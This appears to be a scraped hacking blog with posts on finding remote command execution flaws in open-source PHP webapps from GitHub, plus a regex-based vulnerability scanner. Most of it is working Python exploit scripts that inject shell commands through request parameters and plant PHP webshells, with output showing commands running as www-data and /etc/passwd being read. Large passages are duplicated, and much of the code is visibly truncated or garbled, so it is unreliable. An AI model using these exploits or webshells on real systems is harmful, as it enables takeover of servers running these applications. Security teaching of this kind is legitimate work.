Today, durning surfing at net I found a nice link...
Few days (or weeks) ago I wrote a very simple (and 'dirty') code that after reading
mentioned link, can be used here to check one idea. ;]
I decide to publish here only a 'few lines' so as a homework, try to add other
functions mentioned at OWASP's publication. Try a little modification
of regexp's, you will find DOM-based vulnerabilities at (from ;) remote host(s).
Remember to use it only against your host.
--- < code > ---
#!/usr/bin/env python
# sialala ;]
import re
import urllib2
import sys
import urllib
import os
# defines :
url = sys.argv[1]
fpih = 'first_page.txt'
replaced = 'replaced.txt'
found_log_here = 'FOUND.log'
save_js_log = 'savejs.txt'
extract_js = './output/'
final_log = 'FINAL.log'
# --------------------------------------------
# locate few vulns in files 'here'
def tryhere(extract_js):
final = open(final_log,'w')
for extract_js, extract_jss, filenames in os.walk(extract_js):
print final.writelines(('[+] dirname to check: %s\n') % ( extract_js))
print '\n___________________________________________'
for filename in filenames:
def reada_file(filename):
print final.writelines(('[+] --- filename ------------------------------------ > %s\n') % (filename))
with open(extract_js+'/'+filename,'r') as fd:
n_line = 0
page_file = fd.readlines()
for line in page_file:
n_line += 1
if line.find('function ') != -1:
print final.writelines('\t[!] =========> [+] Found FUNCTION NAME, check at source:\n')
print final.writelines(('\t[ -> line number: [ %d ]\n') % (n_line))
print final.writelines(('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s\n\n') % (line.replace(';',';\n\n')))
print final.writelines('-------> next ----> bug ---> -------------\n')
elif (line.find('document.write') != -1) & (line.find('+') != -1) & (line.find('"') != -1):
print final.writelines('\t[!] =========> [+] Found DOCUMENT.WRITE, check at source:\n')
print final.writelines(('\t[ -> line number: [ %d ]\n') % (n_line))
print final.writelines(('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s\n\n') % (line))
print final.writelines('-------> next ----> bug ---> -------------\n')
elif line.find('eval(') != -1:
print final.writelines('\t[!] =========> [+] Found EVAL() FUNCTION, check at source:\n')
print final.writelines(('\t[ -> line number: [ %d ]\n') % (n_line))
print final.writelines(('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s\n\n') % (line))
print final.writelines('-------> next ----> bug ---> -------------\n')
print ''
## end get_files()
# --
# --------------------------------------------
# f() from
# big thanks for an idea!
def download(url):
webFile = urllib.urlopen(url)
localFile = open(extract_js+url.split('/')[-1], 'w')
# eof ()
# -
# --------------------------------------------
# GET this URL and save it to fpih-log file
def checkThisUrl(url):
print '[+] URL to check: ', url
response = urllib2.urlopen(url) # GET this URL
html_page = response.readlines() # read it per line
fd = open(fpih,'w') # open fpih to write
for line in html_page: # save lines to fpih
print '[+] Content of URL saved to : ',fpih
# eof()
# ----
# open fpih-log and replace ; for ;\n\n to specify
# JS code. (I know it's now 'the best of the best'
# method, but it will help with few simple examples.
# there is no problem to extend it in the future).
def sort_file(file):
print '[+] No we will sort log file a little.\n'
fd = open(fpih,'r') # read fpih
fdRepLog = open(replaced,'w') # create output log
fd_page = fd.readlines()
for line in fd_page:
line = line.replace(';',';\n\n')
if line:
line = line.replace('><','>\n<')
print fdRepLog.writelines(line)
# eof()
# ----
# search for JS files in code
def search_js(file):
fd = open(replaced,'r')
lines = fd.readlines()
found_log = open(found_log_here,'w')
n_line = 0
print found_log.writelines('\n[+] Searching for code from JS files:\n')
for line in lines:
if line.find('<script ') != -1:
if line.find(' src="http:') != -1:
print found_log.writelines(('[!] FOUND: HTTP in SCRIPT tag, line : %d .\n[+] Contain: \n %s') % (n_line,line))
n_line = n_line + 1
print found_log.writelines('\n\n--------------------------- next bug ---------------------------------->\n\n')
elif line.find(' src="/') != -1:
print found_log.writelines(('[!] FOUND: WWW-ROOT in SCRIPT tag, line : %d .\n') % (n_line))
print found_log.writelines(('[+] Contain : \n %s') % (line))
print found_log.writelines('\n\n--------------------------- next bug ---------------------------------->\n\n')
n_line = n_line + 1
# eof()
# ----
# try to get content of JS files found at URL (saved file)
def try2get(file):
fd = open(found_log_here,'r') # here we're looking for JS links
fd_file = fd.readlines() # per line
save_js = open(save_js_log,'w')
for line in fd_file:
r = re.compile(' src="(.*?)"') # regex it
m = # match in line
if m:
txt =
if line.find('http:') != -1:
print save_js.writelines(('%s \n') % (txt))
print save_js.writelines(('%s%s \n') % (url,txt))
# eof
# ----
# --------------------------------------------
# hi:
if len(sys.argv) == 2:
print '[-] try: ', sys.argv[0] ,' URL\n'
--- < code > ---
Read the code to run this code correctly. ;]
Cheers o/
(Hint from OWASP Code Review:
--- < code > ---
and so on... Read it. ;)
--- < code > ---
Monday 24 June 2013
Tuesday 18 June 2013
[EN] RCE - another lesson (2:0)
RCE - LAB 2:0
And again, few examples of vulnerable codes. Few poc's included.
Have fun a take care ;)
All examples you will find at
1. Scilab-WebApp / db-interaction / create-delete-file.php -- (year ago)
--- < code > ---
if(!empty($_POST['file']) && !empty($_POST['directory'])){
shell_exec('touch ../'.$_POST['directory'].'/'.$_POST['file']);
shell_exec('rm ../'.$_POST['directory'].'/'.$_POST['file']);
shell_exec('zip ../'.$_POST['directory'].'/ ../'.$_POST['directory'].'/'.$_POST['file']);
shell_exec('echo "'.$_POST['file'].'" > ../'.$_POST['directory']);
--- < code > ---
As you can see this file is a part of bigger webapp. For our purpose, to learn
how to exploit RCE vulnerabilities, we will use only this one file. Check it out:
To exploit this vulnerability mentioned ('../') directory must be writeable.
Chmod it now (or move your 'create...' file to test-dir - 'xx' dir at my box).
Let's see, what 'actions' we have (to exploit ;]).
PoC will need this settings: (must send all via HTTP POST)
- actions=borrar
- directory=someDir+our;payload
- file=whate.ver
From 'directory' parameter (for this 'action') we should have a very easy way
to exit to let's say 'bash-shell-query-line'. From here, we can add our command.
Let's create a little PoC:
--- < code > ---
kuba@lap:~/src/py/p0c$ cat
#!/usr/bin/env python
# * remember to chmod 777 to 'xx' directory
# --
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/xx/create-delete-file.php'
poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> xxx.php ' # add simple backdoor webshell
params = urllib.urlencode({'action': 'borrar','directory':'./;'+poc+';#' ,'file': 'xxx.php'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()
data =
if response.status == 200:
print 'Server : ', response.status, response.reason
print 'Your shell is /xxx.php\n'
print 'something\'s wrong... :C \n'
--- < code > ---
Output from this simple poc should be similar to this one below:
--- < code > ---
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 12
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:12 .
drwxrwxr-x 9 kuba kuba 4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba kuba 623 Jun 18 15:00 create-delete-file.php
kuba@lap:~/src/py/p0c$ ./
Server : 200 OK
Your shell is /xxx.php
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 16
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:20 .
drwxrwxr-x 9 kuba kuba 4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba kuba 623 Jun 18 15:00 create-delete-file.php
-rw-r--r-- 1 www-data www-data 37 Jun 18 15:20 xxx.php
kuba@lap:~/src/py/p0c$ cat /home/kuba/public_html/github/xx/xxx.php
<?php $c=$_GET[c];echo system($c);?>
--- < code > ---
If you want, create PoC's for other 'actions' (let's say, as a 'homework' ;) )
2. Gravel / gravel-web / adduseraction.php
--- < code > ---
$username = $_POST["name"];
$executeString = 'grvladmin add user '.$username;
//echo $executeString;
$results = shell_exec($executeString);
header("Location: addusers.php");
--- < code > ---
Great let's see, if we can set 'our-evil-name' for this POST parameter:
--- < code > ---
kuba@lap:~/src/py/p0c$ ./
Server : 302 Found
Your shell should be at 777dir//xxx.php
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/rcelab/777dir
total 16
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:30 .
drwxrwxr-x 6 kuba kuba 4096 Jun 18 15:25 ..
-rw-r--r-- 1 www-data www-data 41 Jun 18 10:49 hihi.php
-rw-r--r-- 1 www-data www-data 37 Jun 18 15:30 xxx.php
kuba@lap:~/src/py/p0c$ cat
#!/usr/bin/env python
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/rcelab/adduseraction.php'
poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> ./777dir/xxx.php ' # add backdoor webshell
params = urllib.urlencode({'name': 'x;'+poc+';#'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain",'Location':'addusers.php'}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()
data =
if response.status == 302:
print 'Server : ', response.status, response.reason
print 'Your shell should be at 777dir//xxx.php\n'
print response.status, response.reason
print 'something\'s wrong... :C \n'
--- < code > ---
Browser? Ok:
Response like: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Durinng this search you will probably find similar directories to this one:
Test it to.
3. lab-virtual-ufc / lab_virtual_teoria / students / renameFile.php
--- < code > ---
$login = $_GET["login"];
$area = $_GET["area"];
$oldName = $_GET["oldName"];
$newName = $_GET["newName"];
system("cd $login && cd $area && mv $oldName $newName");
--- < code > ---
What to do here? Let's put a webshell via this vulnerability.
--- < code > ---
kuba@lap:~/src/py/p0c$ cat
#!/usr/bin/env python
# to exploit this vuln, we need dir where we can write file
# --
import urllib2
import sys
host = sys.argv[1]
cmd = 'x;echo%20\'<?php%20$c=$_GET[\'c\'];echo%20system($c);?>\'%20>%20./777dir/sh.php'
vulnurl = '/kuba/github/rcelab/renameFile.php?login='+cmd+'&area=./&oldName=a&newName=b'
vuln = host+vulnurl
if len(sys.argv) == 2:
check = urllib2.urlopen(vuln)
page = check.readlines()
print 'RCE PoC for Tourism WebApp at: ',host
print '[+] add webshell...'
print '[+] your shell should be now in: 777dir/sh.php'
for line in page:
print line
print 'host cmd...\n'
--- < code > ---
Now if we'll run it, we should see something like:
--- < code > ---
kuba@lap:~/src/py/p0c$ ./
RCE PoC for Tourism WebApp at:
[+] add webshell...
[+] your shell should be now in: 777dir/sh.php
--- < code > ---
As you see after those 3 examples, searching for bugs can be very funny job :)
You can develop your skills and help other people with their projects.
Let me know if you have any questions.
And again, few examples of vulnerable codes. Few poc's included.
Have fun a take care ;)
All examples you will find at
1. Scilab-WebApp / db-interaction / create-delete-file.php -- (year ago)
--- < code > ---
if(!empty($_POST['file']) && !empty($_POST['directory'])){
shell_exec('touch ../'.$_POST['directory'].'/'.$_POST['file']);
shell_exec('rm ../'.$_POST['directory'].'/'.$_POST['file']);
shell_exec('zip ../'.$_POST['directory'].'/ ../'.$_POST['directory'].'/'.$_POST['file']);
shell_exec('echo "'.$_POST['file'].'" > ../'.$_POST['directory']);
--- < code > ---
As you can see this file is a part of bigger webapp. For our purpose, to learn
how to exploit RCE vulnerabilities, we will use only this one file. Check it out:
To exploit this vulnerability mentioned ('../') directory must be writeable.
Chmod it now (or move your 'create...' file to test-dir - 'xx' dir at my box).
Let's see, what 'actions' we have (to exploit ;]).
PoC will need this settings: (must send all via HTTP POST)
- actions=borrar
- directory=someDir+our;payload
- file=whate.ver
From 'directory' parameter (for this 'action') we should have a very easy way
to exit to let's say 'bash-shell-query-line'. From here, we can add our command.
Let's create a little PoC:
--- < code > ---
kuba@lap:~/src/py/p0c$ cat
#!/usr/bin/env python
# * remember to chmod 777 to 'xx' directory
# --
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/xx/create-delete-file.php'
poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> xxx.php ' # add simple backdoor webshell
params = urllib.urlencode({'action': 'borrar','directory':'./;'+poc+';#' ,'file': 'xxx.php'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()
data =
if response.status == 200:
print 'Server : ', response.status, response.reason
print 'Your shell is /xxx.php\n'
print 'something\'s wrong... :C \n'
--- < code > ---
Output from this simple poc should be similar to this one below:
--- < code > ---
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 12
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:12 .
drwxrwxr-x 9 kuba kuba 4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba kuba 623 Jun 18 15:00 create-delete-file.php
kuba@lap:~/src/py/p0c$ ./
Server : 200 OK
Your shell is /xxx.php
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 16
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:20 .
drwxrwxr-x 9 kuba kuba 4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba kuba 623 Jun 18 15:00 create-delete-file.php
-rw-r--r-- 1 www-data www-data 37 Jun 18 15:20 xxx.php
kuba@lap:~/src/py/p0c$ cat /home/kuba/public_html/github/xx/xxx.php
<?php $c=$_GET[c];echo system($c);?>
--- < code > ---
If you want, create PoC's for other 'actions' (let's say, as a 'homework' ;) )
2. Gravel / gravel-web / adduseraction.php
--- < code > ---
$username = $_POST["name"];
$executeString = 'grvladmin add user '.$username;
//echo $executeString;
$results = shell_exec($executeString);
header("Location: addusers.php");
--- < code > ---
Great let's see, if we can set 'our-evil-name' for this POST parameter:
--- < code > ---
kuba@lap:~/src/py/p0c$ ./
Server : 302 Found
Your shell should be at 777dir//xxx.php
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/rcelab/777dir
total 16
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:30 .
drwxrwxr-x 6 kuba kuba 4096 Jun 18 15:25 ..
-rw-r--r-- 1 www-data www-data 41 Jun 18 10:49 hihi.php
-rw-r--r-- 1 www-data www-data 37 Jun 18 15:30 xxx.php
kuba@lap:~/src/py/p0c$ cat
#!/usr/bin/env python
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/rcelab/adduseraction.php'
poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> ./777dir/xxx.php ' # add backdoor webshell
params = urllib.urlencode({'name': 'x;'+poc+';#'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain",'Location':'addusers.php'}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()
data =
if response.status == 302:
print 'Server : ', response.status, response.reason
print 'Your shell should be at 777dir//xxx.php\n'
print response.status, response.reason
print 'something\'s wrong... :C \n'
--- < code > ---
Browser? Ok:
Response like: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Durinng this search you will probably find similar directories to this one:
Test it to.
3. lab-virtual-ufc / lab_virtual_teoria / students / renameFile.php
--- < code > ---
$login = $_GET["login"];
$area = $_GET["area"];
$oldName = $_GET["oldName"];
$newName = $_GET["newName"];
system("cd $login && cd $area && mv $oldName $newName");
--- < code > ---
What to do here? Let's put a webshell via this vulnerability.
--- < code > ---
kuba@lap:~/src/py/p0c$ cat
#!/usr/bin/env python
# to exploit this vuln, we need dir where we can write file
# --
import urllib2
import sys
host = sys.argv[1]
cmd = 'x;echo%20\'<?php%20$c=$_GET[\'c\'];echo%20system($c);?>\'%20>%20./777dir/sh.php'
vulnurl = '/kuba/github/rcelab/renameFile.php?login='+cmd+'&area=./&oldName=a&newName=b'
vuln = host+vulnurl
if len(sys.argv) == 2:
check = urllib2.urlopen(vuln)
page = check.readlines()
print 'RCE PoC for Tourism WebApp at: ',host
print '[+] add webshell...'
print '[+] your shell should be now in: 777dir/sh.php'
for line in page:
print line
print 'host cmd...\n'
--- < code > ---
Now if we'll run it, we should see something like:
--- < code > ---
kuba@lap:~/src/py/p0c$ ./
RCE PoC for Tourism WebApp at:
[+] add webshell...
[+] your shell should be now in: 777dir/sh.php
--- < code > ---
As you see after those 3 examples, searching for bugs can be very funny job :)
You can develop your skills and help other people with their projects.
Let me know if you have any questions.
[EN] RCE - another lesson
few days ago I wrote short post about finding potential vulnerable piece of code at
Today we will use it to find few vulnerable 'webapps' and write PoC's for vulnerabilities we will find.
What we will actually need is:
- python
- browser
- internet connection (in case you have a linux with apache/php server installed)
In our 'test-server-box' we will need a directory to store our vulnerable-example-webapp-codes.
For this case let it be /home/kuba/public_html/github/.
How to start.
It's not a problem to download a lot of MBs from github. But checking it all
'manually' can be painful. Let's make a trick to speed-up our work a little.
At this stage, what we want 'the most' is remote command execution vulnerability somewhere in the code.
Let check again post from to find out how we can search for vulnerable code located
In case you don't know what function(s) you need to find (to exploit it via RCE),
maybe this page will interest you.
As we know, we are looking for RCE vulnerabilities. This means we're looking
for piece of code, where user can send 'some value' to webapp, and (because of
no filtering for this 'value') this webapp will 'execute' (via function-to-exec) this 'value'.
Code below is based at only one function (shell_exec for our examples).
Start this code agains few webapps that you found at GitHub. It should find
few 'vulnerabilities'. Check this out:
Our 'simple scanner' found something interesting:
--- output ---
[+] --- filename ------------------------------------ > process.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 3 ]
[ check parameter here, maybe it's not/wrong filtered :]
$output = shell_exec($_GET['command']);
-------> next ----> bug ---> -------------
--- output ---
As you will see after a while playing this code, there is no '100% vulnerable code found'.
This is just as 'see here, maybe its useful' output. ;) You should read the code anyway!
Ok. So now we have few webapps downloaded from GitHub.
Let's extract them to our www-root (/home/kuba/public_html/github/):
Next step is to write a simple 'scanner-code' to find out if there is any vulnerability (RCE
via shell_exec in this case, but there is no problem to extend this 'scanner' to find more vulnerable functions/behaviors).
--- code ---
kuba@lap:~/src/py/siema$ cat
#!/usr/bin/env python
import re
import sys
import os
# get_files - listuje katalog z plikami
def get_files(dirname):
for dirname, dirnames, filenames in os.walk(dirname):
# print path to all filenames.
print '[+] dirname to check: ', dirname
print '\n___________________________________________'
for filename in filenames:
# czyta plik podany z argv[1]
# nastepnie, szuka w nim kolejno 'podatnosci'...
def reada_file(filename):
print '[+] --- filename ------------------------------------ > ',filename
with open(dirname+'/'+filename,'r') as fd:
n_line = 0
for line in fd.readlines():
n_line += 1
rce_regex = re.compile(r'((shell_exec[(]|passthru[(]|system[(]|curl_exec[(])(.*)[$].*)')
found =, line)
if found:
print ('\t[!] =========> [+] Found RCE bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
# ------------------------------ end of tests
# end reada_file()
print ''
## end get_files()
print '[+] Checking started:\n'
print '\n'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
--- code ---
(Of course, similar output we can get from simple grep command, but this is not the case right now.)
Later, as a draft-of-idea I will add here extended version of this 'python-scanner'.
Let's start it:
kuba@lap:~/src/py/siema$ ./ /home/kuba/public_html/github/rcelab/tourism/ > tourism.log
In tourism.log we can find a lot of strings so, I will suggest you 'read' this file by 'less' command:
$ less tourism.log... (Type: /text to find 'text'. Let's check for /shell_exec or /Found)
[+] --- filename ------------------------------------ > process.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 3 ]
[ check parameter here, maybe it's not/wrong filtered :]
$output = shell_exec($_GET['command']);
-------> next ----> bug ---> -------------
Ok, it seems that our super-code found something! ;]
We can verify it in two ways: first (in this case) via browser (because it is a simple GET request) and second: via our simple proof-of-concept code.
Open your browser and go to:
at this stage it was big surprise for me, that this 'webapp' with RCE vulnerability
is actually a WordPress installation ;)
Our vulnerable file is:
After default installation, let's check if we can exploit this vulnerability via browser:
... of course we can! ;]
(By the way, what is 'pino' you will find at GitHub in the 'way' mentioned before:
Ok, so first method (browser) is working, let's find out, how we can write a simple python PoC
to exploit this vulnerbaility:
--- code ---
kuba@lap:~/src/py$ cat
#!/usr/bin/env python
import urllib2
import sys
#host = ''
host = sys.argv[1]
#cmd = 'id;ls%20-la;uname%20-a'
cmd = sys.argv[2]
vulnurl = '/kuba/github/rcelab/tourism/Philippine-Tourism-master/dashboard/git/process.php?command='+cmd
vuln = host+vulnurl
if len(sys.argv) == 3:
check = urllib2.urlopen(vuln)
page = check.readlines()
print 'RCE PoC for Tourism WebApp at: ',host
start = '<pre>'
stop = '</pre>'
print 'exec: ',cmd
for line in page:
print line[len(start):-len(stop)]
print 'host cmd...\n'
--- code ---
Ok, great. now let's check if it's working:
--- code ---
kuba@lap:~/src/py$ ./ uname -a
RCE PoC for Tourism WebApp at:
exec: uname -a
Linux lap 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
--- code ---
As you can see, vulnerability is 'verified'. ;]
If you will have any troubles with command, try like this:
kuba@lap:~/src/py$ ./ cat+/etc/passwd
RCE PoC for Tourism WebApp at:
exec: cat+/etc/passwd
It should work too.
-- Kamikaze
Let's try how we can exploit another vulnerable webapplication.
kuba@lap:~/src/py/siema$ ./ /home/kuba/public_html/github/rcelab/kamikaze/kamikaze-master/|less
(/Found ... to search for RCE ;])
[+] --- filename ------------------------------------ > bloodywork.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 7 ]
[ check parameter here, maybe it's not/wrong filtered :]
-------> next ----> bug ---> -------------
Let's check how bloodywork.php file looks like (and where there is a shell_exec, and what is $cmd param;)):
kuba@lap:~/public_html/github/rcelab/kamikaze/kamikaze-master$ cat bloodywork.php
$controlvalue = $_GET["control"];
$cmd = "./IPC ".$controlvalue;
So our PoC for example before, we can modify a little to exploit 'Kamikaze':
After few modification, code should looks like this:
--- ---
kuba@lap:~/src/py$ cat
#!/usr/bin/env python
# to use this PoC we'll need a directory 777 at remote host!
import urllib2
import sys
#host = ''
host = sys.argv[1]
#cmd = 'id;ls%20-la;uname%20-a'
shell = sys.argv[2]
path = '/github/rcelab/kamikaze/kamikaze-master/'
vulnurl = '/bloodywork.php?control=x;/bin/echo+\'<?php+$c=$_GET[\'c\'];echo+shell_exec($c);?>\'+>+/home/kuba/public_html/'+path+'../../777dir/'+shell
vuln = host+path+vulnurl
if len(sys.argv) == 3:
check = urllib2.urlopen(vuln)
page = check.readlines()
print 'RCE PoC for Kamikaze WebApp at: ',host
print '\n-----\nshell should be here: ',path+shell
print 'host/page/ your-shell-at-webroot\n'
--- ---
(To exploit this vulnerability, you must know location of directory when you can write (chmod 777).
As you can see I decide to create one (777dir) at my /github/'s root (just to show you,
how other this kind of vulnerabilities can be exploited.)
Run poc to see a shell.php in 777dir:
--- code ---
kuba@lap:~/src/py$ ./ hihi.php
RCE PoC for Kamikaze WebApp at:
shell should be here: /github/rcelab/kamikaze/kamikaze-master/hihi.php
--- code ---
--- code ---
kuba@lap:~/src/py$ ls -la /home/kuba/public_html/github/rcelab/777dir/
total 12
drwxrwxrwx 2 kuba kuba 4096 Jun 18 10:49 .
drwxrwxr-x 5 kuba kuba 4096 Jun 18 10:39 ..
-rw-r--r-- 1 www-data www-data 41 Jun 18 10:49 hihi.php
kuba@lap:~/src/py$ cat /home/kuba/public_html/github/rcelab/777dir/hihi.php
<?php $c=$_GET[c];echo shell_exec($c);?>
--- code ---
Now in our browser we can type:
For both cases we used GET method to exploit vulnerable code.
In third example we will send our exploit via POST.
At mentioned GitHub, we can easlz find POST-variable vulnerable to RCE.
Check it out:
kuba@lap:~/src/py/siema$ ./ /home/kuba/public_html/github/rcelab/vauteck/aggreg_platform-master/| less
(/Found... aby znalezc RCE)
--- code ---
[+] --- filename ------------------------------------ > exec.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 5 ]
[ check parameter here, maybe it's not/wrong filtered :]
echo json_encode(shell_exec($cmd));
-------> next ----> bug ---> -------------
--- code ---
Great. Let's see what's in the code:
--- code ---
kuba@lap:~/public_html/github/rcelab/vauteck/aggreg_platform-master/www$ cat exec.php
$cmd = $_POST["cmd"];
echo json_encode(shell_exec($cmd));
--- code ---
We can now start to write a simple proof-of-concept using POST method to send the payload.
--- example poc-code ---
kuba@lap:~/src/py$ cat
#!/usr/bin/env python
import httplib, urllib
import sys
target = sys.argv[1]
poc = sys.argv[2]
path = '/kuba/github/rcelab/vauteck/aggreg_platform-master/www/exec.php'
url = target + path
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = 'cmd='+poc
conn = httplib.HTTPConnection(target)
response = conn.getresponse()
if response.status == 200:
print '[+] exploit works: ',response.status, response.reason
data =
print data
print '[-] sploit failed :C\n'
--- example poc-code ---
And run it, like:
--- code ---
kuba@lap:~/src/py$ ./ id
[+] exploit works: 200 OK
"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
kuba@lap:~/src/py$ ./ uname
[+] exploit works: 200 OK
kuba@lap:~/src/py$ ./ whoami
[+] exploit works: 200 OK
--- code ---
This is how we create 3 PoC's for 3 vulnerable webapplications:
- RCE via GET
- RCE via POST
- remote webshell creating
In case you want to learn how to find vulnerabilities in webapps and write a little code in python,
maybe code below is for you. This is a simple python-based-scanner for PHP webapps.
As you will see below, 'functions to search for vulns' can be easly extended/changed.
So... have fun! ;)
--- ---
#!/usr/bin/env python
import re
import sys
import os
# get_files - listuje katalog z plikami
def get_files(dirname):
for dirname, dirnames, filenames in os.walk(dirname):
# print path to all filenames.
print '[+] dirname to check: ', dirname
print '\n___________________________________________'
for filename in filenames:
# czyta plik podany z argv[1]
# nastepnie, szuka w nim kolejno 'podatnosci'...
def reada_file(filename):
print '[+] --- filename ------------------------------------ > ',filename
with open(dirname+'/'+filename,'r') as fd:
n_line = 0
for line in fd.readlines():
n_line += 1
rce_regex = re.compile(r'((shell_exec[(]|passthru[(]|system[(]|curl_exec[(])(.*)[$].*)')
found =, line)
if found:
print ('\t[!] =========> [+] Found RCE bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
fi_regex = re.compile(r'((include[(]|include_once[(])(.*)[$].*)')
if fi_regex:
found =, line)
if found:
# if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found LFI/RFI (include) bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
fi2_regex = re.compile(r'((require[(]|require_once[(])(.*)[$].*)')
if fi2_regex:
found =, line)
if found:
# if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found LFI/RFI (require) bug, check at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not/wrong filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
fopen_regex = re.compile(r'((fopen[(]|fwrite[(]|file_get_contents[(]|file_put_contents[(]|fread[(])(.*)[$].*)')
if fopen_regex:
found =, line)
if found:
if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found interesting function related to file-write/read. Maybe it\'s bug, check it at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
print ('\t[!] =========> [+] Found interesting function related to file-write/read. Maybe it\'s bug, check it at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
preg_regex = re.compile(r'((preg_replace[(]|preg_match[(])(.*)[$].*)')
if preg_regex:
found =, line)
if found:
if (line.find('_GET') != -1) | (line.find('_POST') != -1) :
print ('\t[!] =========> [+] Found interesting function related to *preg_match* write/read. Maybe it\'s bug, check it at source:\n')
print ('\t[ -> line number: [ %d ]\n') % (n_line)
print ('\t[ check parameter here, maybe it\'s not filtered :]\n %s') % (line)
print '-------> next ----> bug ---> -------------\n'
# ------------------------------ end of tests
# end reada_file()
print ''
## end get_files()
print '[+] Checking started:\n'
print '\n'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
--- ---
If you have any questions, feel free to ask.
Once again, have fun! ;)
few days ago I wrote short post about finding potential vulnerable piece of code at
Today we will use it to find few vulnerable 'webapps' and write PoC's for vulnerabilities we will find.
What we will actually need is:
- python
- browser
- internet connection (in case you have a linux with apache/php server installed)
In our 'test-server-box' we will need a directory to store our vulnerable-example-webapp-codes.
For this case let it be /home/kuba/public_html/github/.
How to start.
It's not a problem to download a lot of MBs from github. But checking it all
'manually' can be painful. Let's make a trick to speed-up our work a little.
At this stage, what we want 'the most' is remote command execution vulnerability somewhere in the code.
Let check again post from to find out how we can search for vulnerable code located
In case you don't know what function(s) you need to find (to exploit it via RCE),
maybe this page will interest you.
As we know, we are looking for RCE vulnerabilities. This means we're looking
for piece of code, where user can send 'some value' to webapp, and (because of
no filtering for this 'value') this webapp will 'execute' (via function-to-exec) this 'value'.
Code below is based at only one function (shell_exec for our examples).
Start this code agains few webapps that you found at GitHub. It should find
few 'vulnerabilities'. Check this out:
Our 'simple scanner' found something interesting:
--- output ---
[+] --- filename ------------------------------------ > process.php
[!] =========> [+] Found RCE bug, check at source:
[ -> line number: [ 3 ]
[ check parameter here, maybe it's not/wrong filtered :]
$output = shell_exec($_GET['command']);
-------> next ----> bug ---> -------------
--- output ---
As you will see after a while playing this code, there is no '100% vulnerable code found'.
This is just as 'see here, maybe its useful' output. ;) You should read the code anyway!
Ok. So now we have few webapps downloaded from GitHub.
Let's extract them to our www-root (/home/kuba/public_html/github/):
